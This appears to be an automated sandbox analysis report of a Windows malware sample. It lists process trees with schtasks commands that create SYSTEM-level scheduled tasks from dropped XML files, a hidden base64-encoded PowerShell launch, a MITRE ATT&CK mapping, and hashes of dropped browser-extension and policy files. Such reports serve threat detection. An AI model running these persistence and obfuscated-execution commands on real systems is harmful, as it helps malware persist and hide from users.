schtasks /DELETE /F /TN "YAjsxgSIQquBU"
2⤵
PID:3332

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "YAjsxgSIQquBU2"
2⤵
PID:540

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "YAjsxgSIQquBU2"
2⤵
PID:640

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vnRCnXJDjFgly"
2⤵
PID:3956

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vnRCnXJDjFgly"
2⤵
PID:2520

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "vnRCnXJDjFgly2"
2⤵
PID:3268

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "vnRCnXJDjFgly2"
2⤵
PID:2372

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "URrITWkPVtIxr"
2⤵
PID:1200

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "URrITWkPVtIxr"
2⤵
PID:1748

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "URrITWkPVtIxr2"
2⤵
PID:2512

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "URrITWkPVtIxr2"
2⤵
PID:4024

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fvbPtJKIKiiYC"
2⤵
PID:3996

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fvbPtJKIKiiYC"
2⤵
PID:1588

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "fvbPtJKIKiiYC2"
2⤵
PID:4352

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "fvbPtJKIKiiYC2"
2⤵
PID:1820

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qFUWsypIjqyCl"
2⤵
PID:4852

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qFUWsypIjqyCl"
2⤵
PID:4280

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qFUWsypIjqyCl2"
2⤵
PID:432

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qFUWsypIjqyCl2"
2⤵
PID:3992

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dTnpxKxkbKsoZ"
2⤵
PID:4200

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dTnpxKxkbKsoZ"
2⤵
PID:3416

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "dTnpxKxkbKsoZ2"
2⤵
PID:3164

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "dTnpxKxkbKsoZ2"
2⤵
PID:1056

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iTtFzCTVRGxRt"
2⤵
PID:400

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iTtFzCTVRGxRt"
2⤵
PID:2528

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "iTtFzCTVRGxRt2"
2⤵
PID:4484

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "iTtFzCTVRGxRt2"
2⤵
PID:1064

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "RqexYqdylWmHLyb2" /F /xml "C:\Program Files (x86)\LjPBjCkxU\HNgTMFj.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1044

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "RqexYqdylWmHLyb"
2⤵
PID:1348

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "RqexYqdylWmHLyb"
2⤵
PID:724

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "RcKzCxNzDspESg" /F /xml "C:\Program Files (x86)\EkAcBLsehYBU2\VNWMwgr.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:464

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "mYkAlnQzdfnWB2" /F /xml "C:\ProgramData\PtxASTBQXXYOENVB\gEpkQEa.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4064

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FbVloGRvRXpHpvUoC2" /F /xml "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\iBwvWTy.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4092

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "dcKGwvyalvyuxhUFuri2" /F /xml "C:\Program Files (x86)\WEPOREuymMJJC\DycnJMJ.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 644
2⤵
- Program crash
PID:4220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4420

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3820 -ip 3820
1⤵
PID:3292

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\EkAcBLsehYBU2\VNWMwgr.xml
Filesize
2KB

MD5
b89e425cafd25ba98bb37645163855ef

SHA1
e947fa5b505187e8bf7d7a03095b0d4ca276715b

SHA256
92ca5131a2037ff89ea2005727e785abd72db3cf3574cfd3278994aaa2df299d

SHA512
b9794a65f5e69086d2ae0adf073a7eadb6ab669cb059282e5c6098f8752b84852710f97be54cb4868025c57c2baafc705045bfa9766b599e1ae1bfa973524c37

Download Submit
C:\Program Files (x86)\LjPBjCkxU\HNgTMFj.xml
Filesize
2KB

MD5
3f2c722752dd808f9cdaeabb8bdbd82e

SHA1
c87697c197fe57e0a32bfe0afd1072512ec5eb0b

SHA256
c4ab93c98b87ccb7458253987c3510ef725da842b596d630266a95e014ad5073

SHA512
c5fe92f59051c3844285653162bc90a4a18f0191b69f7c00381b727f932869e85f1f3a5f3081b5ff91b4258b911f15ba1a31f0f2f1b6b34f640c64c96c5e0283

Download Submit
C:\Program Files (x86)\WEPOREuymMJJC\DycnJMJ.xml
Filesize
2KB

MD5
79fa3f00b3d7226cb3119a6773fc824a

SHA1
288416b20abb08f779da774e8628f6ba90e98747

SHA256
8cd13eafa374d56667b16bd68bc18c1b48fa5e16aba1a80fb61ca3a7a0917c7e

SHA512
e4f3e5853f779823ebb2410a03406c2a8548a19ebe559d8e98050cc4d81078c3b13917b36bbd7392eb042675f978926ac15225fd78c63385a00d57dcdcd8279f

Download Submit
C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\iBwvWTy.xml
Filesize
2KB

MD5
bf1913223e3ac12b58d2e6fa246a823f

SHA1
920c95b75576b23965398d212bf87e88630e1348

SHA256
c9d828fd95166b22eafb23f4797226ef5d69caf1eb2cbc64bd4b7fe2c88cdded

SHA512
0ae389eeb88a82f171d75c0669e96ef0a84cb7d5d20e87b7b379ecb1ff48314ab6fc2a2be7e389e5bbbbee14b57762d195861c23400c020eefec5327a6187d15

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi
Filesize
641KB

MD5
931f22ad8191be59ed9429bf0be8b265

SHA1
67948a1d11bd4dfeec04100d07e88c1c27c66ba4

SHA256
a0935d621fccf7afd5dabb73aa648609d5c000314960aa80bb734f91bc63ccdd

SHA512
f3b20d84a0c44b58897c91ae4ab3a7bc189a0f9b62beee57dc3514887b4e5a333559e4c8cc0564fafc17ce6d734c66d80e8767e8cb624b9e2a269a16a3899dde

Download Submit
C:\ProgramData\PtxASTBQXXYOENVB\gEpkQEa.xml
Filesize
2KB

MD5
0ce35ab902871229a7dffcaa2f5b39d3

SHA1
f01ff796fc10394876fabcdce288ec6877ec7bc5

SHA256
c5372359b35f9be8c0dad42bce9a08bbbb52e60a9cfa1c72064d446430b8881f

SHA512
571d2357a10976b53b21c5b1ad4d539c2795d40fac52a23b79c42b2c8fa36d1e1ba04e2f20ffd6fdc41c6041e04d7ff60e20f29f9e706da2c465da8d82632c7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\_locales\en\messages.json
Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\_locales\pt_BR\messages.json
Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
11KB

MD5
094c7d3ac0207f50f4606ccbf13103d5

SHA1
b9b8f4851bb4b48b0cd46514ded6a2ebf9fad286

SHA256
3634e89e69402e9fd97b930ceb5dc6d6c8ba4eeca33d8edb859c5fcf9dc25718

SHA512
00143440185b9565434c2a53bd4d3e25e3b779f97111acfad9aa4f02c385c77cfb87210826144f81f9271c577f0f73e6f11f93aa8aa9050409ee36d1c5a64d53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hbiichfklkmlebacdfhkojcpmmakmamk\1.2.0_0\_locales\es\messages.json
Filesize
186B

MD5
a14d4b287e82b0c724252d7060b6d9e9

SHA1
da9d3da2df385d48f607445803f5817f635cc52d

SHA256
1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152

SHA512
1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
15KB

MD5
2b0acab16e6705139e6f0596f721e455

SHA1
0c599f4dc1a2f9043f6367fd491e379ac1ac323b

SHA256
cc75de545dc1aa5bffaa484f8248a0994599956f8184d9aadcceb8a94cfdb6f5

SHA512
6ecb46f2c62081bd323d05f7f0bf1772e8a609fb063738b22918639a3b08a6a1b3262804a8130265e5df70641caf69f867f601d80264b2346c60ed4ddf09e367

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
0f7c3a6e9672844ee25871c06d2049f3

SHA1
fd013ad769ad04693cb3b022b232ef66bc6a76ee

SHA256
cfd95d11b164323e901b46599111f142a7bf68972651a663594119a378292135

SHA512
38ac82d347ab795bfef06e1d805528d62a7dd7a25f38efb6f385819179a2fee1d8381e95b58afe0f47b6075aacc8284ea78d0ded7a2bf2a613e9576a9109637f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
11KB

MD5
94785e239a92ca5839cb0ee4567ccc45

SHA1
060e1e758d42a81eaa6c7204a14c5006f01112f9

SHA256
091a1393b56243c701981c685805c1960566eac53888ce463e2c6a80983b9595

SHA512
741f0a62cfefee9aae492b47ca32a96e18988e445eba8626b951c5d98f7606f2728fba1a11869c10388e88bd888d3ed556629486790bcd3a11380f8ceba9b2d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ef02vq21.nzj.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\h6dhg2l4.default-release\prefs.js
Filesize
7KB

MD5
72870c38b7b313ba9ae98f1dce12d548

SHA1
e7f6640e60480fd2b0969b982c5b303484b2aedc

SHA256
e0ebae7aa1b71be98d432d94ea2b051cd5a5061714cce2c3a3db29c558b6074e

SHA512
d4e6f0172617a84f61f976a035d9d858555d304e01ad6f6b4617edef65df159681ba36093ac8ceee6903d4f58f6c9a978c78d2fb80e451638780f3811495ae6f

Download Submit
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
Filesize
7KB

MD5
84e199e7f1748a3525c232934b8488e4

SHA1
b0dac7a4b200586ef57f6eafbe31483a85124a25

SHA256
3e33cf4e00fd9961693622aa3d0abfe9912e53bfb593e5e196f35c1a8f8455d8

SHA512
12843fbc7b074d811838e6ed803323a9a1d54da6bb5c763b3753c9e0234fe01759a546d2fd91ba7b6b2ebe8d93cecae67193300ff02a3aefc53370c63906e89a

Download Submit
memory/1216-17-0x0000000007260000-0x00000000072F6000-memory.dmp

Filesize
600KB

Download
memory/1216-3-0x0000000005BB0000-0x0000000005C16000-memory.dmp

Filesize
408KB

Download
memory/1216-1-0x0000000005410000-0x0000000005A38000-memory.dmp

Filesize
6.2MB

Download
memory/1216-2-0x00000000052E0000-0x0000000005302000-memory.dmp

Filesize
136KB

Download
memory/1216-4-0x0000000005C90000-0x0000000005CF6000-memory.dmp

Filesize
408KB

Download
memory/1216-14-0x0000000005D00000-0x0000000006054000-memory.dmp

Filesize
3.3MB

Download
memory/1216-15-0x00000000062A0000-0x00000000062BE000-memory.dmp

Filesize
120KB

Download
memory/1216-16-0x00000000062E0000-0x000000000632C000-memory.dmp

Filesize
304KB

Download
memory/1216-20-0x00000000078B0000-0x0000000007E54000-memory.dmp

Filesize
5.6MB

Download
memory/1216-19-0x00000000067E0000-0x0000000006802000-memory.dmp

Filesize
136KB

Download
memory/1216-18-0x0000000006790000-0x00000000067AA000-memory.dmp

Filesize
104KB

Download
memory/1216-0-0x0000000002980000-0x00000000029B6000-memory.dmp

Filesize
216KB

Download
memory/1996-27-0x0000000005EF0000-0x0000000006244000-memory.dmp

Filesize
3.3MB

Download
memory/1996-38-0x0000000006A40000-0x0000000006A8C000-memory.dmp

Filesize
304KB

Download
memory/2792-49-0x0000000006180000-0x00000000064D4000-memory.dmp

Filesize
3.3MB

Download
memory/3716-54-0x0000024B2A160000-0x0000024B2A182000-memory.dmp

Filesize
136KB

Download
memory/3820-119-0x0000000004840000-0x00000000048A3000-memory.dmp

Filesize
396KB

Download
memory/3820-23-0x0000000010000000-0x00000000105DB000-memory.dmp

Filesize
5.9MB

Download
memory/3820-75-0x00000000040F0000-0x0000000004175000-memory.dmp

Filesize
532KB

Download
memory/3820-446-0x0000000005410000-0x000000000549A000-memory.dmp

Filesize
552KB

Download
memory/3820-460-0x0000000005670000-0x0000000005753000-memory.dmp

Filesize
908KB

Download